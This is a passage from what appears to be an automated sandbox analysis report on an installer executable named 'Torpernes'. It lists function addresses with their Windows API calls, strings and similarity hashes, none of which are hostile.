                                            • GetMessagePos.USER32 ref: 004049AE
                                            • ScreenToClient.USER32(?,?), ref: 004049C8
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 004049DA
                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404A00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                            • Instruction ID: 33ec571dbc4b5df47611d51f67fe054ec100feaa4e66978c3360ecba7af0637a
                                            • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                            • Instruction Fuzzy Hash: F9015271D00219BADB00DBA5DD45FFFBBBCAB54711F10416BBB10B61D0C7B4A6018B95
                                            Function 00402C7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                            • MulDiv.KERNEL32(00138E1C,00000064,00139780), ref: 00402CC8
                                            • wsprintfW.USER32 ref: 00402CD8
                                            • SetWindowTextW.USER32(?,?), ref: 00402CE8
                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CFA
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402CD2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: e3e17eb3883613bd01c428ecb9c51c517a45ea2d1b7fee79cfc654e1c3b0f8d9
                                            • Instruction ID: 24f1e3b0c7db3a4d5467dde3e45a6c68f3834aeb0eb2857db4594cab4802523f
                                            • Opcode Fuzzy Hash: e3e17eb3883613bd01c428ecb9c51c517a45ea2d1b7fee79cfc654e1c3b0f8d9
                                            • Instruction Fuzzy Hash: 3C014471644248BFEF24AF60DD49BEE3B69FB00305F008439FA06A52D0DBB89954DF59
                                            Function 00401D41 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDC.USER32(?), ref: 00401D44
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                            • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                            • CreateFontIndirectW.GDI32(0040BD70), ref: 00401DBC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID: Tahoma
                                            • API String ID: 3808545654-3580928618
                                            • Opcode ID: 32b6ce07356b06b7402199ccc835c634dd9c912f69bb7b1e70a655b5b2c68e87
                                            • Instruction ID: c56ae0944857913282fa576ad39b26dea61a7ac65424af38da9408b7f1c95b65
                                            • Opcode Fuzzy Hash: 32b6ce07356b06b7402199ccc835c634dd9c912f69bb7b1e70a655b5b2c68e87
                                            • Instruction Fuzzy Hash: A5018631984245AFE7016BB0AE0EB9A7F74EB65306F144479F981B62E2C77810059B7E
                                            Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                            • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                            • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Close$DeleteEnumOpen
                                            • String ID:
                                            • API String ID: 1912718029-0
                                            • Opcode ID: 6ce800f2fb93d43145e75ed60dbe9ac83d8f3b4aa2f8eb12b3c3c44b6db942aa
                                            • Instruction ID: a46f1669fd62fcddf5759aea02b57c8eb471e7750102af69c7615fdbe320007b
                                            • Opcode Fuzzy Hash: 6ce800f2fb93d43145e75ed60dbe9ac83d8f3b4aa2f8eb12b3c3c44b6db942aa
                                            • Instruction Fuzzy Hash: 58116A31904008FEEF219F90DE89EAE3B79EB54348F100476FA05B00A0D3B59E52EA69
                                            Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00401CEB
                                            • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                            • DeleteObject.GDI32(00000000), ref: 00401D36
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: 9a58a4b1b714bdeb85b36b7ac0f1695ca93221bcfe231717776fd1430c9ecfe4
                                            • Instruction ID: 1e99a2e3ee0d8cb2cc55cfcb97cc18e88a7bebe3fbcc68e996072587d9c1a701
                                            • Opcode Fuzzy Hash: 9a58a4b1b714bdeb85b36b7ac0f1695ca93221bcfe231717776fd1430c9ecfe4
                                            • Instruction Fuzzy Hash: 40F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B105466F601F5190C674AD018B35
                                            Function 0040487D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(004226B0,004226B0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 0040491E
                                            • wsprintfW.USER32 ref: 00404927
                                            • SetDlgItemTextW.USER32(?,004226B0), ref: 0040493A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s
                                            • API String ID: 3540041739-3551169577
                                            • Opcode ID: 3885e31ac7d5a85145d604b6571c7e4e29987d56da45c0f8a49a039035cfdad5
                                            • Instruction ID: 30316ae283af339d029f00c0636502938e4caac6650f8f1893a4144cdcbf1ad5
                                            • Opcode Fuzzy Hash: 3885e31ac7d5a85145d604b6571c7e4e29987d56da45c0f8a49a039035cfdad5
                                            • Instruction Fuzzy Hash: E31127336041283BDB10666DDC46E9F328CEB81334F244637FA66F21D1E978CD1286E8
                                            Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: d2f1c536d3abec192f7672cd80b0fc65265ad12a1adfda56e42982a5398ff586
                                            • Instruction ID: 743da8294e509753cf54931ea2bb8f6bb49c191bc618b2a67718bc92c973a6dd
                                            • Opcode Fuzzy Hash: d2f1c536d3abec192f7672cd80b0fc65265ad12a1adfda56e42982a5398ff586
                                            • Instruction Fuzzy Hash: 76217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                            Function 00405CE6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Execute: ,?,00405F59,80000002,Software\Microsoft\Windows\CurrentVersion,?,Execute: ,?), ref: 00405D10
                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00405F59,80000002,Software\Microsoft\Windows\CurrentVersion,?,Execute: ,?), ref: 00405D31
                                            • RegCloseKey.ADVAPI32(?,?,00405F59,80000002,Software\Microsoft\Windows\CurrentVersion,?,Execute: ,?), ref: 00405D54
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID: Execute:
                                            • API String ID: 3677997916-3756222843
                                            • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                            • Instruction ID: f206cf4e1b387d392a6c62c1d3125d9362d5881105c1227b1497b86cc88864d5
                                            • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                            • Instruction Fuzzy Hash: 1501087215020AEBDB218F56ED09EDB3BADEF45350F00802AF905D6260D335D964DFA5
                                            Function 00405864 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 0040586A
                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00405874
                                            • lstrcatW.KERNEL32(?,00409014), ref: 00405886
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405864
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 2659869361-3081826266
                                            • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                            • Instruction ID: cedf87931d265cf8398a6622ec802b5b6c0d438fa642e54ebbf9c46e89377be1
                                            • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                            • Instruction Fuzzy Hash: BAD05E311019206AC2226B449C05D9B63ACEE85340340443BF541B21A1C7781E518AFD
                                            Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                            • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                            • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                              • Part of subcall function 00405D60: wsprintfW.USER32 ref: 00405D6D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                            • String ID:
                                            • API String ID: 1404258612-0
                                            • Opcode ID: 74e200aaa936b3a7db4747673c60ce9f5ca8192e7551dfab6b5e032348f32eee
                                            • Instruction ID: bb6c5fc2a6f8d7f33e71238d936cb3f8bd62bfae150e474e5d39658e2f9f80dc
                                            • Opcode Fuzzy Hash: 74e200aaa936b3a7db4747673c60ce9f5ca8192e7551dfab6b5e032348f32eee
                                            • Instruction Fuzzy Hash: 65114871A00108BECB10DFA5C949DAEBBB9EF04344F20447AF905F62E1E7349E50CB28
                                            Function 00402D05 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                            Download Yara Rule
                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000,00402EE5,00000001,?,?,?,00000000,00403455,?), ref: 00402D18
                                            • GetTickCount.KERNEL32 ref: 00402D36
                                            • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402D53
                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403455,?), ref: 00402D61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: a23b0eeb6e6d4972e87045445d6d4d51cc27d3ed683f4ea74a3e72fc0bad27a9
                                            • Instruction ID: 28aec9c9a202fe59f1d02261ac296c366856500da95e57c0d1cdd64ebec4d4f3
                                            • Opcode Fuzzy Hash: a23b0eeb6e6d4972e87045445d6d4d51cc27d3ed683f4ea74a3e72fc0bad27a9
                                            • Instruction Fuzzy Hash: 30F05E30909235ABD6215B24FE4CD9B7FB9FB01B01B00447AF001B12E4D3B94C81CB9D
                                            Function 00405035 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 00405064
                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004050B5
                                              • Part of subcall function 00404073: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404085
                                            Strings
                                            Memory Dump Source
